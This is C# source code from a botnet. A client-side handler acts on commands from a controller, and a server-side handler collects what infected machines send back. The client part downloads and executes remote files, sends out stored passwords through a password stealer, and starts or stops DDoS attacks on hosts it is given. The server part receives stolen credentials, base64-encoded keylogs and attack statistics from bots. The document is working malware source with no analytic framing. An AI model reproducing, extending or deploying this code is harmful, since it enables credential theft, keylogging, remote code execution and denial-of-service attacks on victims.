bool SendPacket(BOT_PACKET Packet, string strArguments) { try { return(m_ClientSocket.SendPacket(m_ClientSocket.CreatePacket((byte)Packet, strArguments))); } catch { } return(false); }
void m_ClientSocket_OnClientReceiveData(BOT_PACKET Packet, byte[] arr_bArguments) { string[] arr_strArguments = null; if (arr_bArguments != null) { arr_strArguments = UnicodeEncoding.Unicode.GetString(arr_bArguments, 0, arr_bArguments.Length).Split('|'); } switch (Packet) { case BOT_PACKET.TASK: { /* * arr_bArguments[1] = Task * arr_bArguments[2...] = Parameters */ //BOT_TASK Task = (BOT_TASK)arr_bArguments[0]; int iTaskID = -1; if (!int.TryParse(arr_strArguments[0], out iTaskID)) { break; } int iTask = -1; if (!int.TryParse(arr_strArguments[1], out iTask)) { break; } BOT_TASK Task = (BOT_TASK)iTask; string strParameters = arr_strArguments[2]; string[] arr_strParameters = null; if (!string.IsNullOrEmpty(strParameters)) { arr_strParameters = strParameters.Split(' '); } switch (Task) { case BOT_TASK.DOWNLOAD_EXECUTE: { if (arr_strParameters.Length != 1) { break; } if (CUtils.DownloadFile(arr_strParameters[0])) { this.SendTaskExecuted(iTaskID); } } break; case BOT_TASK.UPDATE: { if (arr_strParameters.Length != 1) { break; } if (CUtils.DownloadFile(arr_strParameters[0]) && CMalwareStartup.UninstallBot()) { this.SendTaskExecuted(iTaskID); Application.Exit(); Environment.Exit(0); } } break; case BOT_TASK.UNINSTALL: { if (CMalwareStartup.UninstallBot() && this.SendTaskExecuted(iTaskID)) { Application.Exit(); Environment.Exit(0); } } break; case BOT_TASK.STEALER: { if (this.SendPacket(BOT_PACKET.STEALER, CPasswordStealer.GetPasswords())) { this.SendTaskExecuted(iTaskID); } } break; default: break; } } break; case BOT_PACKET.DDOS: { if (arr_strArguments == null || arr_strArguments.Length != 1 && arr_strArguments.Length != 6 && arr_strArguments.Length != 7) { break; } /* * [0] = ID * [1] = Host * [2] = Port * [3] = Type * [4] = Hours */ int iAttackID; if (!int.TryParse(arr_strArguments[0], out iAttackID)) { break; } if (arr_strArguments.Length > 1) { int iPort, iType, iInterval, iSockets; if (!int.TryParse(arr_strArguments[2], out iPort) || !int.TryParse(arr_strArguments[3], out iType) || !int.TryParse(arr_strArguments[4], out iSockets) || !int.TryParse(arr_strArguments[5], out iInterval)) { break; } DateTime?EndDate = null; if (arr_strArguments.Length == 7) { double dHours = -1; if (!double.TryParse(arr_strArguments[6], out dHours)) { break; } EndDate = DateTime.Now; EndDate = EndDate.Value.AddHours(dHours); } if (CDDoSHandler.StartAttack(iAttackID, iType, arr_strArguments[1], iPort, EndDate, iSockets, iInterval)) { this.SendDdosStarted(iAttackID); } } else { CDDoSHandler.StopAttack(iAttackID); } } break; case BOT_PACKET.PING: this.SendPacket(BOT_PACKET.PING, string.Format( "{0}", CUtils.GetCPUUsage() )); break; default: break; } }
/// <summary> /// Handles received Data from Clients that have been identified as Bot. /// </summary> /// <param name="Bot"></param> /// <param name="Packet"></param> /// <param name="arr_strArguments"></param> void HandleBotPacket(CBot Bot, BOT_PACKET Packet, String[] arr_strArguments) { try { switch (Packet) { case BOT_PACKET.TASK: { if (arr_strArguments == null || arr_strArguments.Length != CConstants.BOT_TASKEXECUTED_ARGUMENT_LENGTH) { break; } int iTaskID = -1; if (!int.TryParse(arr_strArguments[0], out iTaskID)) { break; } m_TaskHandler.SetTaskExecuted(Bot, iTaskID); } break; case BOT_PACKET.DDOS: { if (arr_strArguments == null || arr_strArguments.Length != 1 && arr_strArguments.Length != 3) { break; } int iAttackID = -1; if (!int.TryParse(arr_strArguments[0], out iAttackID)) { break; } if (arr_strArguments.Length > 1) { int iRate, iPPS; if (!int.TryParse(arr_strArguments[1], out iRate) || !int.TryParse(arr_strArguments[2], out iPPS)) { break; } m_DdosHandler.InfoUpdate(Bot.BotClient, iAttackID, iPPS, iRate); } else { m_DdosHandler.SetExecutedByBot(Bot.BotClient, iAttackID); } } break; case BOT_PACKET.PING: { if (arr_strArguments == null || arr_strArguments.Length != 1) { break; } int iCPUUsage = -1; if (!int.TryParse(arr_strArguments[0], out iCPUUsage)) { break; } Bot.CPU_Usage = iCPUUsage; Bot.LastPong = DateTime.Now; m_BotHandler.ReplaceBySocket(Bot.BotClient, Bot); } break; case BOT_PACKET.STEALER: { if (arr_strArguments == null || arr_strArguments.Length != 1) { break; } var arr_strPasswords = arr_strArguments[0].Split(';'); foreach (var strPassword in arr_strPasswords) { var arr_strData = strPassword.Split('*'); if (arr_strData.Length != 4) { break; } CStealerManager.Add(arr_strData[0], arr_strData[1], arr_strData[2], arr_strData[3]); } } break; case BOT_PACKET.KEYLOGS: { if (arr_strArguments == null || arr_strArguments.Length != 1) { break; } var arr_strLogData = UnicodeEncoding.Unicode.GetString(Convert.FromBase64String(arr_strArguments[0])).Split('*'); if (arr_strLogData.Length != 2) { break; } CKeylogManager.Add(arr_strLogData[0], arr_strLogData[1], Bot.BotID); } break; default: break; } } catch { } }